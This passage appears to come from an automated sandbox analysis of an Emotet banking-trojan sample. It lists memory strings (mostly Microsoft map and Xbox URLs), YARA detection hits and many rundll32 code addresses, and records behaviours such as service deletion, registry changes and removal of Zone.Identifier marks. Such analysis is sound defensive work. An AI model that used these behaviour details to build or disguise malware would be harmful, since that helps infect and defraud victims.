                      Source: svchost.exe, 00000010.00000002.309488340.0000023697213000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: svchost.exe, 0000000C.00000002.462341811.0000021EB9E43000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                      Source: svchost.exe, 0000000C.00000002.462341811.0000021EB9E43000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                      Source: svchost.exe, 0000000C.00000002.462341811.0000021EB9E43000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                      Source: svchost.exe, 00000010.00000003.309188880.0000023697261000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 0000000C.00000002.462341811.0000021EB9E43000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000C.00000002.462341811.0000021EB9E43000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 00000010.00000003.309202138.000002369725A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 00000010.00000002.309544105.000002369725C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 00000010.00000003.309188880.0000023697261000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 00000010.00000002.309522855.000002369723D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 00000010.00000002.309544105.000002369725C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 00000010.00000003.309188880.0000023697261000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 00000010.00000002.309538398.000002369724E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 00000010.00000002.309544105.000002369725C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 00000010.00000003.309188880.0000023697261000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 00000010.00000002.309522855.000002369723D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 00000010.00000003.309188880.0000023697261000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 00000010.00000003.309188880.0000023697261000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 00000010.00000003.309188880.0000023697261000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 00000010.00000002.309527175.0000023697242000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 00000010.00000002.309527175.0000023697242000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 00000010.00000003.309188880.0000023697261000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 00000010.00000002.309544105.000002369725C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 00000010.00000003.309202138.000002369725A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 00000010.00000002.309544105.000002369725C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 00000010.00000002.309544105.000002369725C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 00000010.00000002.309551952.0000023697265000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 00000010.00000003.309188880.0000023697261000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 00000010.00000002.309522855.000002369723D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 00000010.00000003.287440739.0000023697232000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 00000010.00000002.309522855.000002369723D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 00000010.00000002.309488340.0000023697213000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.309522855.000002369723D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 00000010.00000003.287440739.0000023697232000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 00000010.00000003.309215409.0000023697240000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 00000010.00000003.287440739.0000023697232000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 00000010.00000002.309517521.000002369723B000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 00000010.00000002.309538398.000002369724E000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 00000003.00000002.198543812.0000000004411000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.198440197.0000000004310000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.343393255.0000000003350000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.343444128.0000000003371000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.462653731.0000000002391000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.463337654.0000000002720000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 4.2.rundll32.exe.2390000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4310000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2720000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2720000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.3370000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.3350000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4310000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4410000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.3350000.1.unpack, type: UNPACKEDPE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_70335CE0 GetModuleFileNameW,PathFindFileNameW,OpenSCManagerW,OpenServiceW,DeleteService,CloseHandle,RegCreateKeyExW,RegDeleteValueW,CloseHandle,MoveFileW,ExitProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Qfjc\Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\SysWOW64\Qfjc\jojcnj.tmq:Zone.IdentifierJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100180F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10016156
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100129C7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10013270
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10013A9C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100172D6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10016BDE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000D3FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001367C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001669A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10012E9C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04416C05
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04428978
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04414121
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0442C19B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04424DAD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04416E8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0441E360
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0441FB04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04419716
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0442533C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0442A7E4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_044183F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0441D04B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0441884A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04425060
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04420C65
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0441F471
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04421C79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04414828
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_044268CB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0441B0E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0442D08F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0442A094
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0441F099
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0441C8A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0442C95E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04414D5F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04415D0E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04422513
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0441E924
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0441792C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04425D36
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_044239E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04418994
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0442B19F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_044181A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_044159B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04427A50
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0441D668
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0441766F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0441427A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04428E79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04422A7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04411600
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04423600
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04413618
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0441DEC9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0441D2CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_044212D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_044276D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04429AE2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04417AE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0442A2EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04420EA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_044272AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_044112B6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04416ABA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04416342
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04412746
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04423745
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04425748
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04418F55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0441DB5B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04425B60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04420705
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04428313
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0441BB28
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0441C3C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_044133F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0441B7F8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0441EF80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04413B97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0441B3A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04413FAB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_044167AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0442CBB0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0441FFB5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050F457F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050EED71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050F53C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050ECDD8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050E542D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050F9C76
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050F8684
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050EE2BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050E80E3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050F030B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050E7D07
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050EF100
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050E8F1B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050E2B2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050E1D2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050EAB26
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050E773B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050F2938
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050E4F4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050E7547
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050F9B59
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050EBD6C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050EF96A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050ED77E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050E918D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050EDB9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050EB394
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050FABAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050E2FA7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050E43BC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050EF3B2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050ECBB1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050E83CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050F19CB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050F83C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050F9DC4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050E5FD2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050F49EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050F8FE8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050E69FD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050E13FB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050E17FB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050EBFF4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050EA7F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050F300F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050E7E0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050ED405
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050E3A00
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050F961A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050F2422
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050F0820
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050EC232
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050F0E49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050E6248
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050EA05D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050F4C55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050F346E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050F066A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050EEA68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050E5A60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050E3C7E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050F9A7E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050FB07B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050F3689
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050E7A87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050E4685
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050F7083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050F229F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050F2C97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050E2290
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050E40AB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050F12A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050FA6B2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050EFEC2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050E64D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050F38D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_050EF6E3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_70331CE0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_7033A00B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_70336987
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_70339A89
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_70347329
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_70346B72
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_7033A392
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_703393C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_7033946D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_70339D50
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_703397DF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_04559C76
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_0454542D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_045480E3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_04558684
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_0454E2BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_0454ED71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_0454D77E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_0455457F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_04547D07
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_04542B2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_0454CDD8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_045553C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_045483CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_04554C55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_0454A05D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_04550E49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_04546248
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_04543C7E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_04559A7E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_0455B07B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_04545A60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_0455346E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_0454EA68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_0455066A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_0455961A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_0454D405
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_04543A00
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_04547E0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_0455300F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_0454C232
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_04550820
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_04552422
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_045538D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_045464D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_0454FEC2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_0454F6E3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_04552C97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_04542290
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_0455229F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_04544685
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_04547A87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_04557083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_04553689
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_0455A6B2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_045512A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_045440AB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_04559B59
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_04547547
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_04544F4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_0454BD6C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_0454F96A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_04548F1B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_0454F100
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_0455030B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_04552938
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_0454773B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_0454AB26
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_04541D2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_04545FD2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 24_2_04559DC4
                      Source: C:\Windows